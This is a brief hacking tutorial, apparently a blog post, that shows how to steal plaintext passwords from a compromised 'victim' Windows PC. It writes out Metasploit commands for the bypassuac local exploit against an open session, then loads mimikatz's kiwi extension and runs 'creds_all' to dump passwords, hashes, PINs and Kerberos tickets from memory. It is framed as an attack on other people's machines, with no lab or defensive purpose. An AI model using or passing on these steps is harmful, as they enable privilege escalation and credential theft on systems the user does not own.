Hack the Password in Plain text of Remote Windows PC

First Hack the Victim PC Using Metasploit (Tutorial How to Hack Remote PC)

Once you had a remote shell with Metasploit all now use the Bypass UAC module, set the session number and exploit it

 use exploit/windows/local/bypassuac
msf exploit (bypassuac_injection)>set session 1

msf exploit (bypassuac_injection)>exploit


mimikatz is a tool I've made to learn C and make somes experiments with Windows security. It's now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory.

Now type load kiwiThen type, “creds_all“:

0 comments:

Post a Comment